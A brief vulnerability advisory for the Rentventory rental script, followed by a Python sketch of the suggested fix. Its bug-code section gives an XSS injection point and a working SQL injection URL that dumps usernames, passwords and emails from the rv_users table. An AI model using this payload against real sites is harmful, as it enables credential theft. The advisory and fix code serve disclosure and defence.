< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rentventory Multiple Script

# Vulnerability Type : Cross Site Scripting & SQL Injection

# Infection : Administrator and user cookies can be stolen. Administrator account details can be stolen.

# Bug Fix Advice : XSS Fix = Malicious characters should be filtered. SQL Inj. Fix = Variables should be restricted so that they accept only integers.

# Demo : http://www.rentventory.com/demo/

# author : Bug Researchers | Kadir DOGAN


#############################################################

< ------------------- header data end ------------------- >



< -- bug code start -- >

/?product=[Xss]&panel=rent%2Fselect_time

/?start=20090811&panel=rent%2Fselect_time&product=-10+union+select+0,1,concat(username,0x3a,password,0x3a,email),3,4,5,6,7,8,9,10,11+FROM+rv_users

< -- bug code end -- >
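
The fix advice in the header, sketched as an added example (not code from Rentventory or from the advisory's author): strict validation of the product, start and panel parameters, a bound query parameter, and HTML encoding on output in addition to input filtering. Python is used for illustration because the page does not name the application's language; the products table, the panel allowlist and all function names are assumptions.

```python
import html
import sqlite3
from datetime import datetime
from urllib.parse import parse_qs

# Assumption: only the panel value seen in the advisory is known to be valid.
ALLOWED_PANELS = {"rent/select_time"}

def parse_request(query_string):
    """Validate product, start and panel; raise ValueError on anything else."""
    params = parse_qs(query_string, keep_blank_values=True)
    product = params.get("product", [""])[0]
    start = params.get("start", [""])[0]
    panel = params.get("panel", [""])[0]
    # SQL injection fix from the advisory: product accepts digits only.
    if not (product.isascii() and product.isdigit() and len(product) <= 9):
        raise ValueError("product must be an integer")
    # start is optional here; when present it must be a real YYYYMMDD date.
    if start:
        if not (start.isascii() and start.isdigit() and len(start) == 8):
            raise ValueError("start must be YYYYMMDD")
        datetime.strptime(start, "%Y%m%d")  # ValueError on impossible dates
    if panel not in ALLOWED_PANELS:
        raise ValueError("unknown panel")
    return int(product), start or None, panel

def find_product(conn, product_id):
    # Bound parameter: the value is never concatenated into the SQL text.
    row = conn.execute("SELECT name FROM products WHERE id = ?",
                       (product_id,)).fetchone()
    return row[0] if row else None

def handle(conn, query_string):
    """Return (status, body) for one request."""
    try:
        product_id, _start, _panel = parse_request(query_string)
    except ValueError:
        return 400, "Bad request"  # rejected input is never echoed back
    name = find_product(conn, product_id)
    if name is None:
        return 404, "Not found"
    # Output encoding, added here alongside the advisory's input filtering.
    return 200, "<h1>" + html.escape(name, quote=True) + "</h1>"

def demo_db():
    # Constructed sample data; the products table is hypothetical.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO products VALUES (10, 'Bike <b>XL</b>')")
    return conn
```

Both request shapes listed in the bug code section are rejected with a 400 before any query runs, because the product value is not a plain integer.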